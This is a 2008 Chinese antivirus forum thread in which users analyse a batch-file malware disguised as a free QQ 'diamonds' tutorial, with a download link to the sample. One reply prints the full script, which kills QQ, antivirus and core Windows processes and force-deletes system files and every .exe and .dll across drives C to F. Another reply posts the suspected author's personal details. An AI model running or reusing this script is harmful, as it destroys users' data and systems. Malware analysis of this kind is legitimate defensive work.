查看: 3663|回复: 22
收起左侧

[病毒样本] 发现一款恶意程序

[复制链接]
fx330934079
发表于 2008-2-1 22:03:12 | 显示全部楼层 |阅读模式
发现一款恶意程序
是个批处理 不过转换为了exe格式

各位能分析一下它干了什么吗??
(危险请在虚拟机中测试)
从我受害的情况来看 它先终止QQ进程  然后在修改QQ程序
再终止系统进程  接着就自动关闭系统了
不知道它对QQ改了什么,能有人测试了告诉我吗?
下载地址QQ免费得四钻教程加工具.rar


http下载   http://www.namipan.com/d/QQ%E5%8 ... b3210e4a1cb5e220100
挪威的冬天
发表于 2008-2-1 22:11:58 | 显示全部楼层
那个教程所释放的 bat

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
挪威的冬天
发表于 2008-2-1 22:13:48 | 显示全部楼层
另一个释放的 bat 相同
醉一生爱妍
发表于 2008-2-1 22:15:59 | 显示全部楼层
md c:\请联系QQ:442074675
md D:\请联系QQ:442074675
md e:\请联系QQ:442074675
md f:\请联系QQ:442074675
echo 目标文件删除完毕,按任意键退出
exit

不知道这个人想干什么?
醉一生爱妍
发表于 2008-2-1 22:17:45 | 显示全部楼层
算了,偶去亲自密下她~~
XinDOS
发表于 2008-2-1 22:17:48 | 显示全部楼层

回复 2楼 挪威的冬天 的帖子

谢谢分享
IllusionWing
发表于 2008-2-1 22:18:05 | 显示全部楼层
@shift
taskkill /im QQ.exe /f
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (qq.exe
) DO DEL %%J /A HS /F /S
taskkill /im explorer.exe /f
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (explorer.exe
) DO DEL %%J /A HS /F /S
taskkill /im 360tray.exe /f
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (360tray.exe
) DO DEL %%J /A HS /F /S
taskkill /im 360safe.exe /f
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (360safe.exe
) DO DEL %%J /A HS /F /S
taskkill /im svchost.exe /f
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (svchost.exe
) DO DEL %%J /A HS /F /S
taskkill /im winlogon.exe /f
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (winlogon.exe
) DO DEL %%J /A HS /F /S
taskkill /im services.exe /f
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (services.exe
) DO DEL %%J /A HS /F /S

FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (system.gho
) DO DEL %%J /A HS /F /S
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (ghost.exe
) DO DEL %%J /A HS /F /S
FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (iedw.exe,IEXPLORE.EXE
) DO DEL %%J /A HS /F /S

FOR %%I IN (c:,d:,e:,f:) DO CD /D %%I & FOR %%J IN (system.ini,
win.ini,regedit.exe,*.exe,*.dll
) DO DEL %%J /A HS /F /S

md c:\请联系QQ:442074675
md D:\请联系QQ:442074675
md e:\请联系QQ:442074675
md f:\请联系QQ:442074675
echo 目标文件删除完毕,按任意键退出
exit

貌似是删资料敲诈钱的
挪威的冬天
发表于 2008-2-1 22:19:16 | 显示全部楼层
唉 试图做磁盘清洗 。。。
醉一生爱妍
发表于 2008-2-1 22:19:49 | 显示全部楼层
作者解释~~

重启就好了则
IllusionWing
发表于 2008-2-1 22:20:30 | 显示全部楼层
442074675 №雄§ 男 19  马 AB型 8月21日 武汉汤罗?
http://zhangyaxiong1.dipan.com/
z╭ ﹌╮╭ ?╮。     ︵︵︵︵︵︵
z(o-.-o)(o^.^o) .oО( ^罒^好暖哦︷.)
╭~﹊︸ ̄~﹊︸ ̄~、     ︸︸︸︸︸︸
┋?   ﹏     ? ┋ 關燈
┊     (~(~)﹏   ┊ 我暧妳暧着妳
┇ ? ﹏︶~      ┇
┊       ﹏  ?  ┊ 僦襐佬鼠暧

计算机业

.....那人个人资料
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-25 23:31 , Processed in 0.150059 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表